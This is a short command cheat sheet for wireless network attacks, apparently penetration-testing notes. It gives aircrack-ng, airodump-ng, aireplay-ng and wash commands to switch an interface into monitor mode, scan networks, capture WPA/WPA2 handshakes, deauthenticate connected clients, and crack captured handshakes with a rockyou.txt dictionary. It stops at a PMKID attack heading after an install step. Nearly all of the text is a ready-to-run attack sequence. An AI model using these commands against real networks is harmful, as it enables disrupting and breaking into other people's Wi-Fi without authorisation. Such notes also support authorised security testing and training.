📡 Wireless attacks

View the configuration of network interfaces:

ifconfig && iwconfig && airmon-ng

Turn a network interface on/off:

ifconfig wlan0 up

ifconfig wlan0 down

Restart the network manager:

service NetworkManager restart

Set the WLAN regulatory domain:

iw reg set HR

Set the transmit power of a wireless interface (too high a value can be illegal in some countries):

iwconfig wlan0 txpower 40

Set a wireless network interface to monitor mode:

airmon-ng start wlan0

ifconfig wlan0 down && iwconfig wlan0 mode monitor && ifconfig wlan0 up

Set a wireless network interface to monitor mode on a specified channel:

airmon-ng start wlan0 8

iwconfig wlan0 channel 8

[Optional] Kill services that might interfere with wireless network interfaces in monitor mode:

airmon-ng check kill

Set a wireless network interface back to managed mode:

airmon-ng stop wlan0mon

ifconfig wlan0 down && iwconfig wlan0 mode managed && ifconfig wlan0 up

Search for WiFi networks within your range:

airodump-ng --wps -w airodump_sweep_results wlan0mon

wash -a -i wlan0mon

Monitor a WiFi network to capture handshakes/requests:

airodump-ng wlan0mon --channel 8 -w airodump_essid_results --essid essid --bssid FF:FF:FF:FF:FF:FF

Check if a wireless interface supports packet injection:

aireplay-ng --test wlan1 -e essid -a FF:FF:FF:FF:FF:FF

Monitor a WiFi network to capture a WPA/WPA2 4-way handshake:

airodump-ng wlan0mon --channel 8 -w airodump_essid_results --essid essid --bssid FF:FF:FF:FF:FF:FF

Deauthenticate clients from a WiFi network:

aireplay-ng --deauth 10 wlan1 -e essid -a FF:FF:FF:FF:FF:FF

Start the dictionary attack against a WPA/WPA2 handshake:

aircrack-ng -e essid -b FF:FF:FF:FF:FF:FF -w rockyou.txt airodump_essid_results*.cap

PMKID Attack: Crack the WPA/WPA2 authentication without deauthenticating clients.

apt-get update && apt-get -y install hcxtools
